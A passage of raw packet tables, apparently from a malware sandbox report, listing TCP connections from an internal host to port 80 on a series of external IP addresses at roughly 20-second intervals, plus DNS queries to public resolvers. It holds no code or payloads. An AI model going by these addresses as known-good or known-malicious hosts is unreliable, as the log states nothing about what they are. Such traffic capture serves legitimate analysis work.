Jul 5, 2023 14:06:25.559319019 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.559370995 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.559370995 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.559381962 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.559444904 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.559477091 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.559510946 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.559525013 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.559604883 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.559659004 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.701657057 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.701734066 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.701790094 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.701847076 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.701886892 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.701888084 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.701901913 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.701956987 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.702002048 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.702009916 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.702050924 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.702064037 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.702119112 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.702133894 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.702172041 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.702188969 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.702225924 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.702280998 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.702336073 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.702341080 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.702341080 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.702389002 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.702442884 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.702450991 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.702450991 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.702496052 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.702497959 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.702548027 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.702550888 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.702594995 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.702604055 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.702656031 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.702658892 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.702698946 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.702714920 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.702770948 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.702792883 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.702792883 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.702824116 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.702877998 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.702891111 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.702931881 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.702944040 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.702944040 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.702985048 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.703037977 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.703090906 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.703094006 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.703144073 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.703174114 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.703197956 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.703252077 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.703305960 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.703308105 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.703360081 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.703413010 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.703468084 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.703483105 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.703521967 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.703574896 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.703622103 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.703628063 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.703681946 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.703735113 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.703788996 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.703803062 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.703841925 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.703895092 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.703896046 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.703895092 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.703950882 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.703990936 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.704005003 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.704092979 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.704121113 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.704149008 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.704166889 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.704201937 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.704245090 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.704255104 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.704292059 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.704308987 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.704339981 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.704363108 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.704416990 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.704452991 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.704469919 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.704505920 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.704524994 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.704550982 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.704577923 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.704603910 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.704631090 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.704658031 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.704684973 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.704737902 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.704792023 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.704819918 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.704845905 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.704874039 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.704899073 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.704937935 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.704952955 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.704984903 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.705007076 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.705044985 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.705060959 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.705094099 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.705116034 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.705168962 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.705172062 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.705172062 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.705221891 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.705276012 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.705280066 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.705328941 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.705332994 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.705382109 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.705385923 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.705430984 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.705440998 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.705480099 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.705496073 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.705530882 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.705549955 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.705602884 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.705605984 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.705605984 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.705656052 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.705708981 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.705713034 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.705713034 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.705760956 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.705809116 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.705813885 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.705862045 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:25.705866098 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.705938101 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:25.705938101 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:30.560403109 CEST	80	50281	34.138.169.8	192.168.11.20
Jul 5, 2023 14:06:30.560621023 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:06:46.715241909 CEST	50281	80	192.168.11.20	34.138.169.8
Jul 5, 2023 14:07:26.766181946 CEST	50287	80	192.168.11.20	217.70.184.50
Jul 5, 2023 14:07:26.793598890 CEST	80	50287	217.70.184.50	192.168.11.20
Jul 5, 2023 14:07:26.793759108 CEST	50287	80	192.168.11.20	217.70.184.50
Jul 5, 2023 14:07:26.793879032 CEST	50287	80	192.168.11.20	217.70.184.50
Jul 5, 2023 14:07:26.821104050 CEST	80	50287	217.70.184.50	192.168.11.20
Jul 5, 2023 14:07:26.825927973 CEST	80	50287	217.70.184.50	192.168.11.20
Jul 5, 2023 14:07:26.825959921 CEST	80	50287	217.70.184.50	192.168.11.20
Jul 5, 2023 14:07:26.825979948 CEST	80	50287	217.70.184.50	192.168.11.20
Jul 5, 2023 14:07:26.826208115 CEST	80	50287	217.70.184.50	192.168.11.20
Jul 5, 2023 14:07:26.826484919 CEST	50287	80	192.168.11.20	217.70.184.50
Jul 5, 2023 14:07:26.826519012 CEST	50287	80	192.168.11.20	217.70.184.50
Jul 5, 2023 14:07:26.826689959 CEST	50287	80	192.168.11.20	217.70.184.50
Jul 5, 2023 14:07:26.853972912 CEST	80	50287	217.70.184.50	192.168.11.20
Jul 5, 2023 14:07:26.854310036 CEST	50287	80	192.168.11.20	217.70.184.50
Jul 5, 2023 14:07:47.332129002 CEST	50289	80	192.168.11.20	103.169.142.0
Jul 5, 2023 14:07:47.341315985 CEST	80	50289	103.169.142.0	192.168.11.20
Jul 5, 2023 14:07:47.341638088 CEST	50289	80	192.168.11.20	103.169.142.0
Jul 5, 2023 14:07:47.341707945 CEST	50289	80	192.168.11.20	103.169.142.0
Jul 5, 2023 14:07:47.350888014 CEST	80	50289	103.169.142.0	192.168.11.20
Jul 5, 2023 14:07:47.374197960 CEST	80	50289	103.169.142.0	192.168.11.20
Jul 5, 2023 14:07:47.374577999 CEST	80	50289	103.169.142.0	192.168.11.20
Jul 5, 2023 14:07:47.374639034 CEST	50289	80	192.168.11.20	103.169.142.0
Jul 5, 2023 14:07:47.374861002 CEST	50289	80	192.168.11.20	103.169.142.0
Jul 5, 2023 14:07:47.383804083 CEST	80	50289	103.169.142.0	192.168.11.20
Jul 5, 2023 14:08:27.710417032 CEST	50290	80	192.168.11.20	217.160.0.102
Jul 5, 2023 14:08:27.725168943 CEST	80	50290	217.160.0.102	192.168.11.20
Jul 5, 2023 14:08:27.725389957 CEST	50290	80	192.168.11.20	217.160.0.102
Jul 5, 2023 14:08:27.725455999 CEST	50290	80	192.168.11.20	217.160.0.102
Jul 5, 2023 14:08:27.740148067 CEST	80	50290	217.160.0.102	192.168.11.20
Jul 5, 2023 14:08:28.021315098 CEST	80	50290	217.160.0.102	192.168.11.20
Jul 5, 2023 14:08:28.021394014 CEST	80	50290	217.160.0.102	192.168.11.20
Jul 5, 2023 14:08:28.021450996 CEST	80	50290	217.160.0.102	192.168.11.20
Jul 5, 2023 14:08:28.021501064 CEST	80	50290	217.160.0.102	192.168.11.20
Jul 5, 2023 14:08:28.021724939 CEST	50290	80	192.168.11.20	217.160.0.102
Jul 5, 2023 14:08:28.021836042 CEST	50290	80	192.168.11.20	217.160.0.102
Jul 5, 2023 14:08:28.021836042 CEST	50290	80	192.168.11.20	217.160.0.102
Jul 5, 2023 14:08:28.031199932 CEST	80	50290	217.160.0.102	192.168.11.20
Jul 5, 2023 14:08:28.031277895 CEST	80	50290	217.160.0.102	192.168.11.20
Jul 5, 2023 14:08:28.031336069 CEST	80	50290	217.160.0.102	192.168.11.20
Jul 5, 2023 14:08:28.031359911 CEST	50290	80	192.168.11.20	217.160.0.102
Jul 5, 2023 14:08:28.031390905 CEST	80	50290	217.160.0.102	192.168.11.20
Jul 5, 2023 14:08:28.031445026 CEST	80	50290	217.160.0.102	192.168.11.20
Jul 5, 2023 14:08:28.031501055 CEST	80	50290	217.160.0.102	192.168.11.20
Jul 5, 2023 14:08:28.031532049 CEST	50290	80	192.168.11.20	217.160.0.102
Jul 5, 2023 14:08:28.031697989 CEST	50290	80	192.168.11.20	217.160.0.102
Jul 5, 2023 14:08:28.031697989 CEST	50290	80	192.168.11.20	217.160.0.102
Jul 5, 2023 14:08:28.036271095 CEST	80	50290	217.160.0.102	192.168.11.20
Jul 5, 2023 14:08:28.036349058 CEST	80	50290	217.160.0.102	192.168.11.20
Jul 5, 2023 14:08:28.036437035 CEST	50290	80	192.168.11.20	217.160.0.102
Jul 5, 2023 14:08:28.036606073 CEST	50290	80	192.168.11.20	217.160.0.102
Jul 5, 2023 14:08:28.036751032 CEST	80	50290	217.160.0.102	192.168.11.20
Jul 5, 2023 14:08:28.036948919 CEST	50290	80	192.168.11.20	217.160.0.102
Jul 5, 2023 14:08:28.037100077 CEST	80	50290	217.160.0.102	192.168.11.20
Jul 5, 2023 14:08:28.037297010 CEST	50290	80	192.168.11.20	217.160.0.102
Jul 5, 2023 14:08:48.495992899 CEST	50291	80	192.168.11.20	104.17.158.1
Jul 5, 2023 14:08:48.505234957 CEST	80	50291	104.17.158.1	192.168.11.20
Jul 5, 2023 14:08:48.505532026 CEST	50291	80	192.168.11.20	104.17.158.1
Jul 5, 2023 14:08:48.505599976 CEST	50291	80	192.168.11.20	104.17.158.1
Jul 5, 2023 14:08:48.514834881 CEST	80	50291	104.17.158.1	192.168.11.20
Jul 5, 2023 14:08:48.518661976 CEST	80	50291	104.17.158.1	192.168.11.20
Jul 5, 2023 14:08:48.518748999 CEST	80	50291	104.17.158.1	192.168.11.20
Jul 5, 2023 14:08:48.519159079 CEST	50291	80	192.168.11.20	104.17.158.1
Jul 5, 2023 14:08:48.519159079 CEST	50291	80	192.168.11.20	104.17.158.1
Jul 5, 2023 14:08:48.528619051 CEST	80	50291	104.17.158.1	192.168.11.20
Jul 5, 2023 14:09:08.738533020 CEST	50292	80	192.168.11.20	172.67.140.128
Jul 5, 2023 14:09:08.746974945 CEST	80	50292	172.67.140.128	192.168.11.20
Jul 5, 2023 14:09:08.747175932 CEST	50292	80	192.168.11.20	172.67.140.128
Jul 5, 2023 14:09:08.747292042 CEST	50292	80	192.168.11.20	172.67.140.128
Jul 5, 2023 14:09:08.755676031 CEST	80	50292	172.67.140.128	192.168.11.20
Jul 5, 2023 14:09:08.768744946 CEST	80	50292	172.67.140.128	192.168.11.20
Jul 5, 2023 14:09:08.768776894 CEST	80	50292	172.67.140.128	192.168.11.20
Jul 5, 2023 14:09:08.769074917 CEST	50292	80	192.168.11.20	172.67.140.128
Jul 5, 2023 14:09:08.777529001 CEST	80	50292	172.67.140.128	192.168.11.20
Jul 5, 2023 14:09:29.074405909 CEST	50293	80	192.168.11.20	35.208.230.52
Jul 5, 2023 14:09:29.250726938 CEST	80	50293	35.208.230.52	192.168.11.20
Jul 5, 2023 14:09:29.251000881 CEST	50293	80	192.168.11.20	35.208.230.52
Jul 5, 2023 14:09:29.251000881 CEST	50293	80	192.168.11.20	35.208.230.52
Jul 5, 2023 14:09:29.426796913 CEST	80	50293	35.208.230.52	192.168.11.20
Jul 5, 2023 14:09:29.426867962 CEST	80	50293	35.208.230.52	192.168.11.20
Jul 5, 2023 14:09:29.426915884 CEST	80	50293	35.208.230.52	192.168.11.20
Jul 5, 2023 14:09:29.427334070 CEST	50293	80	192.168.11.20	35.208.230.52
Jul 5, 2023 14:09:29.603174925 CEST	80	50293	35.208.230.52	192.168.11.20
Jul 5, 2023 14:10:12.307255030 CEST	50294	80	192.168.11.20	162.241.203.15
Jul 5, 2023 14:10:12.424894094 CEST	80	50294	162.241.203.15	192.168.11.20
Jul 5, 2023 14:10:12.425112009 CEST	50294	80	192.168.11.20	162.241.203.15
Jul 5, 2023 14:10:12.425170898 CEST	50294	80	192.168.11.20	162.241.203.15
Jul 5, 2023 14:10:12.543179035 CEST	80	50294	162.241.203.15	192.168.11.20
Jul 5, 2023 14:10:12.623610973 CEST	80	50294	162.241.203.15	192.168.11.20
Jul 5, 2023 14:10:12.623694897 CEST	80	50294	162.241.203.15	192.168.11.20
Jul 5, 2023 14:10:12.624207020 CEST	50294	80	192.168.11.20	162.241.203.15
Jul 5, 2023 14:10:12.624207973 CEST	50294	80	192.168.11.20	162.241.203.15
Jul 5, 2023 14:10:12.742034912 CEST	80	50294	162.241.203.15	192.168.11.20
Jul 5, 2023 14:10:31.091028929 CEST	50295	80	192.168.11.20	160.124.149.176
Jul 5, 2023 14:10:31.285048962 CEST	80	50295	160.124.149.176	192.168.11.20
Jul 5, 2023 14:10:31.285384893 CEST	50295	80	192.168.11.20	160.124.149.176
Jul 5, 2023 14:10:31.285471916 CEST	50295	80	192.168.11.20	160.124.149.176
Jul 5, 2023 14:10:31.482108116 CEST	80	50295	160.124.149.176	192.168.11.20
Jul 5, 2023 14:10:31.482228041 CEST	80	50295	160.124.149.176	192.168.11.20
Jul 5, 2023 14:10:31.482321978 CEST	80	50295	160.124.149.176	192.168.11.20
Jul 5, 2023 14:10:31.482568026 CEST	50295	80	192.168.11.20	160.124.149.176
Jul 5, 2023 14:10:31.482724905 CEST	50295	80	192.168.11.20	160.124.149.176
Jul 5, 2023 14:10:31.482914925 CEST	50295	80	192.168.11.20	160.124.149.176
Jul 5, 2023 14:10:31.676542997 CEST	80	50295	160.124.149.176	192.168.11.20
Jul 5, 2023 14:10:51.652523994 CEST	50296	80	192.168.11.20	198.54.117.216
Jul 5, 2023 14:10:51.818428040 CEST	80	50296	198.54.117.216	192.168.11.20
Jul 5, 2023 14:10:51.818698883 CEST	50296	80	192.168.11.20	198.54.117.216
Jul 5, 2023 14:10:51.818758011 CEST	50296	80	192.168.11.20	198.54.117.216
Jul 5, 2023 14:10:51.984592915 CEST	80	50296	198.54.117.216	192.168.11.20
Jul 5, 2023 14:10:51.984633923 CEST	80	50296	198.54.117.216	192.168.11.20
Jul 5, 2023 14:11:32.660161972 CEST	50297	80	192.168.11.20	190.115.19.43
Jul 5, 2023 14:11:32.675944090 CEST	80	50297	190.115.19.43	192.168.11.20
Jul 5, 2023 14:11:32.676099062 CEST	50297	80	192.168.11.20	190.115.19.43
Jul 5, 2023 14:11:32.676206112 CEST	50297	80	192.168.11.20	190.115.19.43
Jul 5, 2023 14:11:32.691926003 CEST	80	50297	190.115.19.43	192.168.11.20
Jul 5, 2023 14:11:32.693744898 CEST	80	50297	190.115.19.43	192.168.11.20
Jul 5, 2023 14:11:32.693799973 CEST	80	50297	190.115.19.43	192.168.11.20
Jul 5, 2023 14:11:32.694516897 CEST	50297	80	192.168.11.20	190.115.19.43
Jul 5, 2023 14:11:32.694516897 CEST	50297	80	192.168.11.20	190.115.19.43
Jul 5, 2023 14:11:32.710558891 CEST	80	50297	190.115.19.43	192.168.11.20
Jul 5, 2023 14:12:13.045125008 CEST	50303	80	192.168.11.20	76.223.105.230
Jul 5, 2023 14:12:13.056077003 CEST	80	50303	76.223.105.230	192.168.11.20
Jul 5, 2023 14:12:13.056220055 CEST	50303	80	192.168.11.20	76.223.105.230
Jul 5, 2023 14:12:13.056310892 CEST	50303	80	192.168.11.20	76.223.105.230
Jul 5, 2023 14:12:13.067754984 CEST	80	50303	76.223.105.230	192.168.11.20
Jul 5, 2023 14:12:13.074908018 CEST	80	50303	76.223.105.230	192.168.11.20
Jul 5, 2023 14:12:13.074919939 CEST	80	50303	76.223.105.230	192.168.11.20
Jul 5, 2023 14:12:13.075265884 CEST	50303	80	192.168.11.20	76.223.105.230
Jul 5, 2023 14:12:13.075265884 CEST	50303	80	192.168.11.20	76.223.105.230
Jul 5, 2023 14:12:13.086718082 CEST	80	50303	76.223.105.230	192.168.11.20
Jul 5, 2023 14:12:53.087975979 CEST	50304	80	192.168.11.20	156.251.235.194
Jul 5, 2023 14:12:53.245690107 CEST	80	50304	156.251.235.194	192.168.11.20
Jul 5, 2023 14:12:53.246083975 CEST	50304	80	192.168.11.20	156.251.235.194
Jul 5, 2023 14:12:53.246083975 CEST	50304	80	192.168.11.20	156.251.235.194
Jul 5, 2023 14:12:53.404087067 CEST	80	50304	156.251.235.194	192.168.11.20
Jul 5, 2023 14:12:53.460268974 CEST	50304	80	192.168.11.20	156.251.235.194
Jul 5, 2023 14:12:53.756925106 CEST	50304	80	192.168.11.20	156.251.235.194
Jul 5, 2023 14:12:53.914638996 CEST	80	50304	156.251.235.194	192.168.11.20
Jul 5, 2023 14:13:10.260257006 CEST	50305	80	192.168.11.20	156.246.142.1
Jul 5, 2023 14:13:10.414207935 CEST	80	50305	156.246.142.1	192.168.11.20
Jul 5, 2023 14:13:10.414546013 CEST	50305	80	192.168.11.20	156.246.142.1
Jul 5, 2023 14:13:10.414546013 CEST	50305	80	192.168.11.20	156.246.142.1
Jul 5, 2023 14:13:10.568478107 CEST	80	50305	156.246.142.1	192.168.11.20
Jul 5, 2023 14:13:10.568568945 CEST	80	50305	156.246.142.1	192.168.11.20
Jul 5, 2023 14:13:10.568896055 CEST	50305	80	192.168.11.20	156.246.142.1
Jul 5, 2023 14:13:10.568897009 CEST	50305	80	192.168.11.20	156.246.142.1
Jul 5, 2023 14:13:10.723242998 CEST	80	50305	156.246.142.1	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 5, 2023 14:07:06.148437023 CEST	61157	53	192.168.11.20	9.9.9.9
Jul 5, 2023 14:07:07.161382914 CEST	61157	53	192.168.11.20	1.1.1.1
Jul 5, 2023 14:07:07.576929092 CEST	53	61157	1.1.1.1	192.168.11.20
Jul 5, 2023 14:07:07.577241898 CEST	61157	53	192.168.11.20	9.9.9.9
Jul 5, 2023 14:07:08.608817101 CEST	53	61157	9.9.9.9	192.168.11.20
Jul 5, 2023 14:07:10.192543983 CEST	53	61157	9.9.9.9	192.168.11.20
Jul 5, 2023 14:07:26.751029968 CEST	52081	53	192.168.11.20	9.9.9.9
Jul 5, 2023 14:07:26.765177965 CEST	53	52081	9.9.9.9	192.168.11.20
Jul 5, 2023 14:07:46.965363979 CEST	62740	53	192.168.11.20	1.1.1.1
Jul 5, 2023 14:07:47.328978062 CEST	53	62740	1.1.1.1	192.168.11.20
Jul 5, 2023 14:08:27.690854073 CEST	64946	53	192.168.11.20	1.1.1.1
Jul 5, 2023 14:08:27.709623098 CEST	53	64946	1.1.1.1	192.168.11.20
Jul 5, 2023 14:08:48.170726061 CEST	61423	53	192.168.11.20	1.1.1.1
Jul 5, 2023 14:08:48.495079994 CEST	53	61423	1.1.1.1	192.168.11.20
Jul 5, 2023 14:09:08.713042021 CEST	51483	53	192.168.11.20	1.1.1.1
Jul 5, 2023 14:09:08.737606049 CEST	53	51483	1.1.1.1	192.168.11.20
Jul 5, 2023 14:09:28.911592960 CEST	51449	53	192.168.11.20	1.1.1.1
Jul 5, 2023 14:09:29.073396921 CEST	53	51449	1.1.1.1	192.168.11.20
Jul 5, 2023 14:09:49.578965902 CEST	62147	53	192.168.11.20	1.1.1.1
Jul 5, 2023 14:09:49.591669083 CEST	53	62147	1.1.1.1	192.168.11.20
Jul 5, 2023 14:10:11.745985031 CEST	57075	53	192.168.11.20	1.1.1.1
Jul 5, 2023 14:10:12.306437969 CEST	53	57075	1.1.1.1	192.168.11.20
Jul 5, 2023 14:10:30.757507086 CEST	54321	53	192.168.11.20	1.1.1.1
Jul 5, 2023 14:10:31.090182066 CEST	53	54321	1.1.1.1	192.168.11.20
Jul 5, 2023 14:10:51.627756119 CEST	53583	53	192.168.11.20	1.1.1.1
Jul 5, 2023 14:10:51.651547909 CEST	53	53583	1.1.1.1	192.168.11.20
Jul 5, 2023 14:11:12.123373985 CEST	51062	53	192.168.11.20	1.1.1.1
Jul 5, 2023 14:11:12.139378071 CEST	53	51062	1.1.1.1	192.168.11.20
Jul 5, 2023 14:11:32.290600061 CEST	53849	53	192.168.11.20	1.1.1.1
Jul 5, 2023 14:11:32.659423113 CEST	53	53849	1.1.1.1	192.168.11.20
Jul 5, 2023 14:11:52.833197117 CEST	53057	53	192.168.11.20	1.1.1.1
Jul 5, 2023 14:11:52.867872000 CEST	53	53057	1.1.1.1	192.168.11.20
Jul 5, 2023 14:12:13.016021013 CEST	64297	53	192.168.11.20	1.1.1.1
Jul 5, 2023 14:12:13.044336081 CEST	53	64297	1.1.1.1	192.168.11.20
